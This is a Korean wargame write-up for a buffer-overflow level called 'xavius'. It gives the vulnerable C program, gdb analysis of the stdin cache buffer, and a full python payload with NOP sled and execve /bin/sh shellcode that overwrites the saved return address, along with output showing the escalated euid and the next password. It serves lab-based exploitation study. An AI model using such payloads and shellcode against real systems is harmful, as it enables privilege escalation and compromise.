[19] nightmare -> xavius

nightmare / beg for me

[nightmare@localhost nightmare]$ /bin/bash2

[nightmare@localhost nightmare]$ export SHELL=/bin/bash2

[ xavius.c ]

#include <stdio.h>
#include <stdlib.h>
#include <dumpcode.h>
 
main()
{
        char buffer[40];
        char *ret_addr;
 
        // overflow!
        fgets(buffer, 256, stdin);
        printf("%s\n", buffer);
 
        if(*(buffer+47) == '\xbf')
        {
                printf("stack retbayed you!\n");
                exit(0);
        }
 
        if(*(buffer+47) == '\x08')
        {
                printf("binary image retbayed you, too!!\n");
                exit(0);
        }
 
        // check if the ret_addr is library function or not
        memcpy(&ret_addr, buffer+44, 4);
        while(memcmp(ret_addr, "\x90\x90", 2) != 0)     // end point of function
        {
                if(*ret_addr == '\xc9'){                // leave
                        if(*(ret_addr+1) == '\xc3'){    // ret
                                printf("You cannot use library function!\n");
                                exit(0);
                        }
                }
                ret_addr++;
        }
 
        // stack destroyer
        memset(buffer, 0, 44);
        memset(buffer+48, 0, 0xbfffffff - (int)(buffer+48));
 
        // LD_* eraser
        // 40 : extra space for memset function
        memset(buffer-3000, 0, 3000-40);
}
 

[ Stack ]

buffer          초기화

saved ebp    초기화

saved eip      0xbf(x) , 0x08(x)

[ gdb ]

(gdb) set disassembly-flavor intel

(gdb) disas main

Dump of assembler code for function main:

0x8048714 <main>:       push   %ebp

0x8048715 <main+1>:     mov    %ebp,%esp

0x8048717 <main+3>:     sub    %esp,44

0x804871a <main+6>:     mov    %eax,%ds:0x8049a3c <-- stdin

0x804871f <main+11>:    push   %eax

0x8048720 <main+12>:    push   0x100

0x8048725 <main+17>:    lea    %eax,[%ebp-40]

0x8048728 <main+20>:    push   %eax

0x8048729 <main+21>:    call   0x8048408 <fgets>    => fgets(buffer,256,stdin)

.... 생략 ...

0x8048826 <main+274>:   add    %esp,12

0x8048829 <main+277>:   leave

fgets( buffer, 256, stdin )

=> stdin 입력을 받는다 -> cache memory ( 0x40... 주소 어딘가에 저장한다 ) -> 마지막으로 buffer에 저장한다

(gdb) b *0x8048829

Breakpoint 1 at 0x8048829

(gdb) run

Starting program: /home/nightmare/xavius.cp

aaaaaaaaaaaaaaaaaaa

aaaaaaaaaaaaaaaaaaa

Breakpoint 1, 0x8048829 in main ()

(gdb) x/4x 0x8049a3c

0x8049a3c <stdin@@GLIBC_2.0>:   0x401068c0      0x00000000      0x00000000      0x08049950

(gdb) x/4x 0x401068c0

0x401068c0 <_IO_2_1_stdin_>:    0xfbad2288      0x4001501d      0x4001501d      0x40015000

(gdb) x/4x 0x40015000

0x40015000:     0x61616161      0x61616161      0x61616161      0x61616161

(gdb)

0x40015010:     0x61616161      0x61616161      0x61616161      0x0000000a

* fgets의 캐시 메모리에 쉘코드를 올리고 프로세스의 saved eip주소에 쉘코드의 주소로 덮어씌운다

[ payload ]

[nightmare@localhost nightmare]$ (python -c 'print "A" * 44 + "\x80\x50\x01\x40" + "\x90" * 300 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"';cat) | ./xavius

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒P@▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒

id

uid=518(nightmare) gid=518(nightmare) euid=519(xavius) egid=519(xavius) groups=518(nightmare)

my-pass

euid = 519

throw me away

whoami

xavius

buffer	"A" * 40
saved ebp	"AAAA"
saved eip	&cachememory ( shellcode )